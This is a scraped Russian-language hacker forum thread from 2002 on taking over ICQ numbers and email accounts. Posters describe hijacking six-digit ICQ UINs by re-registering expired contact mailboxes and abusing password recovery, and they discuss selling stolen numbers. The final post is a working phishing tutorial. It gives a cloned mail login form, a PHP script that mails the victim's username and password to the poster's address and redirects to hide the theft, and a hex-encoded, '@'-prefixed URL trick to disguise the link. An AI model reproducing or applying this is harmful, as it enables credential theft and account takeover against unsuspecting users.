ANTICHAT — форум по информационной безопасности, OSINT и технологиям

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (RedX @ ноября 27 2002,16:10)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (MrPort @ ноября 24 2002,19:18)</td></tr><tr><td id="QUOTE">И кстати, никто не знает как взломать почту...ну например на Яндексе...подскажит адресок статьи.[/QUOTE]<span id='postcolor'>
Браток могу подсказать интересную статью про то как увести почту глупенькому юзеру.
Короче сгоняй на этот форум и если что не поймешь спрашивай. Для примера-намека дам эту урлу..., а там сам реши что делать.[/QUOTE]<span id='postcolor'>
на этот форум не попадешь... можно адрес поприличние?

Чиркнул я во ФЛЕЙМе пару строк Mail hack, на первую лябуду внимания не обращайте... :), а так на второй странице есть путевый совет.

=&gt;MrPort
Не обрашай внимание на статью про mailbot'а, это для ламаков. А если ты серьезно хочешь чегонить сам смастерить..., то нужно малость ручками поработать..., самому стать ботом :)


=&gt; KinDzaDza
Прошу прошения, мой сайт умер..., вместе с форумом :(

Повторяюсь для ленивых, во ФЛЕЙМ'е есть копия этой статьи.

Я расскажу вам, как достать какой-нибудь <span style='color:#009900'>шестизначный UIN</span>. Существует несколько способов для достижения этой цели, всевозможные генераторы паролей, кража .dat файла, и наконец троян. Но я расскажу вам о более доступном методе. Чтоб увезти определённый UIN, нам надо <span style='color:#009900'>завладеть его мылом</span>. Нет, мы не будем резко переходить на тему: взлом e-mail. Я же сказал что метод простой. Очень кстати для нас, почтовые сервера имеют обыкновение <span style='color:#009900'>удалять неактивных пользователей</span>, скажем через полгода после последнего визита. А т.к регистрация шестизначек проводилась года три назад, то среди них есть такие UIN'ы, про которые пользователи вообще забыли, или <span style='color:#009900'>забыли поменять старое мыло</span>. Значит, у нас есть шанс зарегистрировать это мыло и воспользоваться системой напоминания пароля. Чтобы упростить поиск UIN'ов которые <span style='color:#009900'>содержат в инфе e-mail</span> нам потребуется программа <span style='color:#00FF00'>Assault</span> и немного терпения. Существует множество такого рода программ, но лично мне понравилась эта. Assault сканирует указанный диапазон ICQ UIN'нов и собирает их e-mail адреса, имеет очень удобный способ фильтрации. Итак, имея солидный <span style='color:#00FF00'>ICQ лист</span>, можно начать и сам процесс <span style='color:#009900'>регистрации</span>. Терпеливо перебирая один лог за другим, вскоре ваши старания будут вознаграждены, думаю что есть шанс достать до <span style='color:#009900'>10 UIN'ов за день</span>.
Для тех кто в танке: Чтоб Assault работал, нужно в Threads прописать хотя бы один UIN. Правда, для повышения скорости желательно прописать больше, UIN'ов 10.

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (RedX @ декабря 12 2002,11:39)</td></tr><tr><td id="QUOTE">Повторяюсь для ленивых, во ФЛЕЙМ'е есть копия этой статьи.

Я расскажу вам, как достать какой-нибудь <span style='color:#009900'>шестизначный UIN</span>. Существует несколько способов для достижения этой цели, всевозможные генераторы паролей, кража .dat файла, и наконец троян. Но я расскажу вам о более доступном методе. Чтоб увезти определённый UIN, нам надо <span style='color:#009900'>завладеть его мылом</span>. Нет, мы не будем резко переходить на тему: взлом e-mail. Я же сказал что метод простой. Очень кстати для нас, почтовые сервера имеют обыкновение <span style='color:#009900'>удалять неактивных пользователей</span>, скажем через полгода после последнего визита. А т.к регистрация шестизначек проводилась года три назад, то среди них есть такие UIN'ы, про которые пользователи вообще забыли, или <span style='color:#009900'>забыли поменять старое мыло</span>. Значит, у нас есть шанс зарегистрировать это мыло и воспользоваться системой напоминания пароля. Чтобы упростить поиск UIN'ов которые <span style='color:#009900'>содержат в инфе e-mail</span> нам потребуется программа <span style='color:#00FF00'>Assault</span> и немного терпения. Существует множество такого рода программ, но лично мне понравилась эта. Assault сканирует указанный диапазон ICQ UIN'нов и собирает их e-mail адреса, имеет очень удобный способ фильтрации. Итак, имея солидный <span style='color:#00FF00'>ICQ лист</span>, можно начать и сам процесс <span style='color:#009900'>регистрации</span>. Терпеливо перебирая один лог за другим, вскоре ваши старания будут вознаграждены, думаю что есть шанс достать до <span style='color:#009900'>10 UIN'ов за день</span>.
Для тех кто в танке: Чтоб Assault работал, нужно в Threads прописать хотя бы один UIN. Правда, для повышения скорости желательно прописать больше, UIN'ов 10.[/QUOTE]<span id='postcolor'>
Да, парень отстаешь ты от жизни, нету уже шестерок, вон уже семерки будут на исходе, а ты тут про шестаки пишешь. Эх,

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (tableton® @ декабря 12 2002,20:44)</td></tr><tr><td id="QUOTE">Да, парень отстаешь ты от жизни, нету уже шестерок, вон уже семерки будут на исходе, а ты тут про шестаки пишешь.[/QUOTE]<span id='postcolor'>
нет, это ты отстаешь.. вот я к примеру, достал себе красивый шестизнак.. до этого у меня была 9-ка..
А достал почитав подобные статейки... Если конкретнее, зарегал мыло, на которое должен был приходить пасс и благополучно получил его.. Причем пароль был элементарный - &quot;sex&quot;.. ступил я маленько, надо было сперва перебор попробовать!
А вот чего трудно достать, так это пятизнаки! Самый уродливый и нескладный пятизнак можно продать баков за 150... А если он будет выглядеть как-нить типа &quot;12345&quot;, &quot;55555&quot; или &quot;11011&quot; то потянет на 200-300..

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Самый уродливый и нескладный пятизнак можно продать баков за 150... А если он будет выглядеть как-нить типа &quot;12345&quot;, &quot;55555&quot; или &quot;11011&quot; то потянет на 200-300..
[/QUOTE]<span id='postcolor'>
&nbsp; &nbsp;У меня такой вопрос. Достал я, например,
пятизначку и мне надо её продать. А теперь сам вопрос: &quot;где мне продать пятизнак&quot;?

=&gt; tableton®

Мутишь ты..., сам прикинь, мыло в общем умирает через полгода после последнего визита. И с каждым днем появляется все больше и больше таких мыл. Учти это. Шестизначки еще долго будут уводить друг у друга.

Теперь я раскажу вам о самом простом методе взлома, расчитанный на лоха. Ведь так просто заИметь шестизначку, но так-же легко её потерять. Для начала нам нужно сохранить на харде страницу <span style='color:#00FF00'>ошибки</span>. Сами видете два поля ввода для <span style='color:#009900'>логин</span> и <span style='color:#009900'>пасс</span>. Нам нужно чтобы введя в эти поля данные пароль отсылался прямо к нам в руки. Теперь открываем её с помощью <span style='color:#009900'>html</span> редактора, лучше всего использовать <span style='color:#00FF00'>DreamweaverMX</span>, хотя можете сделать это обычным Notepad, Вот фрагмент скрипта:

<span style='color:#0033FF'>&lt;table cellpadding=1 cellspacing=0 border=0&gt;
&lt;form method=&quot;post&quot; name=&quot;logon&quot; action=&quot;http://mail.xakep.ru/cgi-bin/mail&quot; onSubmit=&quot;Save();&quot;&gt;
&lt;tr&gt;
&lt;td class=small align=right&gt;&lt;b&gt;eiaei&lt;/b&gt;&lt;/td&gt;
&lt;td class=text&gt;&lt;input type=&quot;text&quot; name=&quot;username&quot; size=&quot;8&quot; style=&quot;width: 95px;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;domain&quot; value=&quot;xakep.ru&quot;&gt;&lt;/td&gt;
&lt;td class=text&gt; @xakep.ru&lt;/td&gt;
&lt;td&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
&lt;td class=small align=right&gt;&lt;b&gt;ia?ieu&lt;/b&gt;&lt;/td&gt;
&lt;td class=text&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot; size=&quot;8&quot; style=&quot;width: 95px;&quot;&gt;&lt;/td&gt;
&lt;/tr&gt;</span>

Нас интересуют только <span style='color:red'>action</span>, <span style='color:red'>username</span> и <span style='color:red'>password</span>. За что отвечают username и password на монятно. А в action нам следует указать путь к нашему <span style='color:#009900'>php скрипту</span>. Вот весь скрипт:

<span style='color:#0033FF'>&lt;?
mail(&quot;redx@narod.ru&quot;,
&quot;Lost password&quot;,
&quot;$username\n
$password
&quot;);
echo (&quot;
&lt;META HTTP-EQUIV=\&quot;Refresh\&quot; content =\&quot;0; URL=http://mail.xakep.ru/cgi-bin/mail?index=1\&quot;&gt;
&quot;);
?&gt;</span>

<span style='color:#009900'>Редирект</span> тоже играет важную функцию, и он обязательно должен указывать на страницку ошибки, чтоб не возникало подозрений. Вроде у нас все настроено, осталось провести тест, посмотри на мой <span style='color:#00FF00'>пример</span>.
Для танкистов: <span style='color:#CCFFFF'>нам нужен хост с поддержкой php</span>. Из бесплатных нам подойдет <span style='color:#00FF00'>Holm</span>.

Кажись вы не довольны тем что <span style='color:#009900'>url</span> у вас получился типа <span style='color:#009900'>http://antilamer.h1.ru</span>. И возникает вопрос, как бы все это затарить. Я предлагаю вам хотя бы кодировать в <span style='color:#00FF00'>hex</span>. И мы можем превратить наше http://antilamer.h1.ru в <span style='color:#009900'>%61%6E%74%69%6C%61%6D%65%72% 2E%68%31%2E%72%75</span>. Можно перед hex кодом добавить еще http://xakep.ru@. Выглядеть это будет так:
<span style='color:#009900'>http://xakep.ru@%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%7 2%75</span>

Удачного хака.